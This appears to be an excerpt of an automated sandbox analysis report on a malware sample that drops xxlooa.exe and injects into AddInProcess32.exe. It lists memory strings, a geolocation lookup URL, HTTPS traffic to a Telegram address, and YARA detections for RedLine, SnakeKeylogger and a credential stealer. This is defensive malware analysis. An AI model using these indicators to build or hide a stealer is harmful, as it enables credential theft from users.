Source: AddInProcess32.exe, 00000011.00000002.2957865272.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004211000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: AddInProcess32.exe, 00000011.00000002.2944387011.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B2E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: AddInProcess32.exe, 00000011.00000002.2941974221.0000000002B97000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2962597104.0000000005136000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: AddInProcess32.exe, 00000013.00000002.2943610200.0000000002AE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: AddInProcess32.exe, 00000011.00000002.2944387011.0000000002F29000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B2E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B54000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002AE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: AddInProcess32.exe, 00000011.00000002.2957865272.0000000004084000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.00000000040AB000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000003EDC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.000000000418D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004036000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B79000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003C6B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003A9C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D4C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: AddInProcess32.exe, 00000011.00000002.2957865272.0000000004168000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004012000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.000000000403D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004269000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003BFC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003A77000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003E28000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003C46000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: AddInProcess32.exe, 00000011.00000002.2957865272.0000000004084000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.00000000040AB000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000003EDC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.000000000418D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004036000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B79000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003C6B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003A9C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D4C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003BF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: AddInProcess32.exe, 00000011.00000002.2957865272.0000000004168000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004012000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.000000000403D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004269000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003BFC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003A77000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003E28000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003C46000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: AddInProcess32.exe, 00000011.00000002.2937564862.0000000000E05000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2944387011.000000000305D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2965455811.00000000063CD000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2937564862.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: AddInProcess32.exe, 00000011.00000002.2957865272.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004211000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: AddInProcess32.exe, 00000011.00000002.2957865272.00000000041DF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.2957865272.0000000004211000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2956077647.0000000003D9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: AddInProcess32.exe, 00000013.00000002.2943610200.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002B79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: AddInProcess32.exe, 00000011.00000002.2944387011.00000000030AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/hF
Source: AddInProcess32.exe, 00000011.00000002.2944387011.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000002.2943610200.0000000002C77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB
Source: AddInProcess32.exe, 00000013.00000002.2943610200.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/x6

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49778 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 18.2.xxlooa.exe.41e3728.4.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 18.2.xxlooa.exe.414a812.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.xxlooa.exe.449537a.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 18.2.xxlooa.exe.4117852.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 18.2.xxlooa.exe.41b0772.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.xxlooa.exe.43c948a.4.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 18.2.xxlooa.exe.41e3728.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 18.2.xxlooa.exe.4117852.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.File.com.exe.3cc6962.6.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.File.com.exe.3c2da42.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.xxlooa.exe.442f41a.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.File.com.exe.3bfaa72.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.AddInProcess32.exe.2b5fd6e.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.AddInProcess32.exe.2b5fd6e.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 18.2.xxlooa.exe.41b0772.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.File.com.exe.3c60a02.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.xxlooa.exe.43c948a.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.File.com.exe.3bfaa72.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.File.com.exe.3c2da42.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.xxlooa.exe.43fc45a.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.xxlooa.exe.43fc45a.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.xxlooa.exe.44c8330.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 18.2.xxlooa.exe.40e4882.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.AddInProcess32.exe.2b60c8e.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.AddInProcess32.exe.2b60c8e.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 17.2.AddInProcess32.exe.2cb0f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.AddInProcess32.exe.2cb0f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.AddInProcess32.exe.2cb0f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 18.2.xxlooa.exe.40e4882.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.AddInProcess32.exe.2cb0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.AddInProcess32.exe.2cb0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.AddInProcess32.exe.2cb0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 17.2.AddInProcess32.exe.2cb0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.AddInProcess32.exe.2cb0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.AddInProcess32.exe.2cb0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 17.2.AddInProcess32.exe.2cb0f20.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.AddInProcess32.exe.2cb0f20.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.AddInProcess32.exe.2cb0f20.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.xxlooa.exe.449537a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.xxlooa.exe.44c8330.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.File.com.exe.3cf9918.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.File.com.exe.3cc6962.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000011.00000002.2943065011.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Process Memory Space: AddInProcess32.exe PID: 6936, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: AddInProcess32.exe PID: 7592, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\AppData\Roaming\xxlooa.exe

Code function: 16_2_071CA7F8 CreateProcessAsUserW,

16_2_071CA7F8

Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_02AA89F0	0_2_02AA89F0
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_02AAB9B5	0_2_02AAB9B5
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_02AA7DD8	0_2_02AA7DD8
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_073426C8	0_2_073426C8
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_07342698	0_2_07342698
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_0734C5F0	0_2_0734C5F0
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_0734DE28	0_2_0734DE28
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_073526F8	0_2_073526F8
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_07359D78	0_2_07359D78
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_0735D5A0	0_2_0735D5A0
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_0735D591	0_2_0735D591
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_07C11BF8	0_2_07C11BF8
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_07C11180	0_2_07C11180
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_07C11165	0_2_07C11165
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_07C3AB90	0_2_07C3AB90
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_07C35F26	0_2_07C35F26
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_07C33DC0	0_2_07C33DC0
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_07C33DD8	0_2_07C33DD8
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_07C33DE8	0_2_07C33DE8
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_096CD6E8	0_2_096CD6E8
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_096CAC24	0_2_096CAC24
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_096CD6D8	0_2_096CD6D8
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_07C11BD4	0_2_07C11BD4
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_026A89F0	16_2_026A89F0
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_026A7B00	16_2_026A7B00
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_026AB9B5	16_2_026AB9B5
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_060C2770	16_2_060C2770
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_060C8E50	16_2_060C8E50
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071C5728	16_2_071C5728
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071C4D70	16_2_071C4D70
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071CAD90	16_2_071CAD90
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071C3428	16_2_071C3428
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071C4B90	16_2_071C4B90
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071C36B9	16_2_071C36B9
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071C36C8	16_2_071C36C8
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071C3D58	16_2_071C3D58
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071C3D4B	16_2_071C3D4B
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071C4D60	16_2_071C4D60
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071C3418	16_2_071C3418
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071C7430	16_2_071C7430
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071C0B88	16_2_071C0B88
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071C4B80	16_2_071C4B80
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071C0B81	16_2_071C0B81
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071C43B3	16_2_071C43B3
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071C43C0	16_2_071C43C0
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071CFA38	16_2_071CFA38
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071C5230	16_2_071C5230
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071C9128	16_2_071C9128
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071CE9A8	16_2_071CE9A8
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071C89F8	16_2_071C89F8
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071C0006	16_2_071C0006
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_071C0040	16_2_071C0040
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_0879DD28	16_2_0879DD28
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_087925C8	16_2_087925C8
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_0879FDF0	16_2_0879FDF0
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_0879FDDF	16_2_0879FDDF
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_0879C4F0	16_2_0879C4F0
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_087925B8	16_2_087925B8
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_088EAE3C	16_2_088EAE3C
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_088ED7B9	16_2_088ED7B9
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_088ED7C8	16_2_088ED7C8
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_08B626F8	16_2_08B626F8
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_08B69CFD	16_2_08B69CFD
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_08B6D598	16_2_08B6D598
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_08B6D589	16_2_08B6D589
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_09F31BF8	16_2_09F31BF8
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_09F3DD90	16_2_09F3DD90
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_09F3DBAC	16_2_09F3DBAC
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_09F31180	16_2_09F31180
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_09F3DB85	16_2_09F3DB85
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_09F3FB28	16_2_09F3FB28
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_09F3F830	16_2_09F3F830
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_09F3EC38	16_2_09F3EC38
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_09F3F820	16_2_09F3F820
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_09F3EC28	16_2_09F3EC28
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_09FBDBB0	16_2_09FBDBB0
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_09FBBFA0	16_2_09FBBFA0
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_09FBFBB8	16_2_09FBFBB8
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_09FBBFAB	16_2_09FBBFAB
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_09FB2B00	16_2_09FB2B00
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_09FB3EE0	16_2_09FB3EE0
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_09FB2AD1	16_2_09FB2AD1
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_09F31BD4	16_2_09F31BD4
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_060C8E2A	16_2_060C8E2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0040DC11	17_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_00401650	17_2_00401650
